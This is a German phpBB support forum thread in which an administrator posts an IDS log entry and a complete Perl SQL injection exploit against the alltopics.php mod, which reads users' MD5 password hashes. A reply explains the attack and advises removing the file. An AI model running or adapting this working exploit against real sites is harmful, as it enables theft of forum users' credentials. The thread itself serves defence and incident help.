sicherheits probleme?

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
der-rene
Mitglied
Beiträge: 42
Registriert: 03.03.2006 20:27

sicherheits probleme?

Beitrag von der-rene »

Hallo,

in der Log Datei trat folgendes auf...

IDS:r57 phpBB2 exploit a2e2#20022006|http://meineurl/phpBB2/|admin|password|2|phpbb_

was heisst das denn?

und was hat dieser code zu bedeuten ? mus sich angst haben?

Code: Alles auswählen

#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+    Mod: http://www.phpbbhacks.com/download/2821    +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_
users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
lg der panische rené
h-o
Mitglied
Beiträge: 385
Registriert: 09.08.2004 16:17

Re: sicherheits probleme?

Beitrag von h-o »

der-rene hat geschrieben:mus sich angst haben?
Wenn du alltopics.php einsetzt, dann ja (aus der Logdatei geht das ja nicht hervor).

Mit obigem Code lassen sich die mit MD5-verschlüsselten Passwörter (sog. MD5-Hashes) aus der Datenbank auslesen. Das wäre alleine nicht so tragisch, wenn es nicht diverse MD5 "Reverse Engineer's" gäbe (auf die der Autor dieses Hacks übrigens von seiner Homepage aus verweist), so dass aus den MD5-Hashes die "echten" Passwörter zum Einloggen angezeigt werden können.

Lösche also die alltopics.php, sofern vorhanden (theoretisch könntest du wohl auch $start auf sinnvolle numerische Daten prüfen).

Der Hack-Autor ist übrigens der gleiche, der vor ein paar Wochen offenbar ein Sicherheitsproblemchen ausgerechnet im Cracker Tracker 4.1.7 entdeckt hat. Steht zumindest auf seiner Homepage. Da dürfte es Anwender des CT-MODs wohl nur wenig trösten, dass der Hack-Autor in seinem "Support-Forum" selbst phpBB und CT einsetzt :D
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“